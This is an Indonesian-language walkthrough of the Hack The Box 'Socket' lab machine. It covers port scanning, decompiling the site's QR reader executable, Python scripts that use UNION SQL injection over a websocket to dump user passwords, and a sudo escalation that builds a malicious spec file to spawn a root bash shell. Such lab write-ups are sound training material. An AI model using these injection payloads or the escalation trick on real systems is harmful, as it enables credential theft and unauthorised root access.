Soket | Hack The Box Writeup/Walkthrough | Oleh Md Amiruddin

Apr 03 2023
Ini adalah artikel/panduan dari mesin Hack the Box “Socket” oleh Md Amiruddin Machine Link :https://app.hackthebox.

Ini adalah tulisan/panduan dari mesin Hack the Box “Socket” oleh Md Amiruddin

Tautan Mesin:https://app.hackthebox.com/machines/Socket

Mesin IP : 10.10.11.206

Pencacahan:

Hasil Nmap

sudo nmap -sV -sC -A 10.10.11.206

      
                

22 tcp port terbuka untuk ssh

80 tcp port terbuka untuk http

Soket web pada port 5789

mari lakukan pemindaian kerentanan websocket di port 5789 dengan STEWS

python3 STEWS-vuln-detect.py -1 -n -u 10.10.11.206:5789

      
                

Menjelajahi Situs Web:

Sekarang tambahkan qreader.htb 10.10.11.206 ini ke /etc/hosts

Sekarang akses situs web http://qreader.htb/ melalui browser Anda.

Melalui situs web ini kami dapat membuat dan memindai kode qr.

Kita juga dapat mengunduh perangkat lunak untuk windows dan linux jadi, mari unduh file .exe dan dekompilasi menggunakan pyinstxtractor .

python3 pyinstxtractor.py qreader.exe

      
                

pip3 install uncompyle6

uncompyle6 qreader.pyc > qreader.py

Mari kita buat skrip python untuk mengeksploitasi SQL Injection yang ditemukan pada kode sumber di atas.

from websocket import create_connection
import json

ws_host = 'ws://qreader.htb:5789'

VERSION = '0.0.3" UNION SELECT group_concat(answer),"2","3","4" FROM answers;-- -'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()

Mari tulis kode untuk mencetak kata sandi pengguna.

from websocket import create_connection
import json

ws_host = 'ws://qreader.htb:5789'

VERSION = '0.0.3" UNION SELECT username,password,"3","4" from users;-- -'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
print(result)
ws.close()

      
                

Sekarang saatnya login melalui ssh.

Sekarang salin bendera pengguna Anda.

Menjalankan sudo -l untuk melihat perintah apa saja yang dapat kita jalankan sebagai root tanpa kata sandi.

build-installer.sh dapat dijalankan sebagai root tanpa kata sandi.

Perintah digunakan

echo 'import os;os.system("/bin/bash")' > root.spec

sudo /usr/local/sbin/build-installer.sh build root.spec

      
                

Terima kasih telah membaca.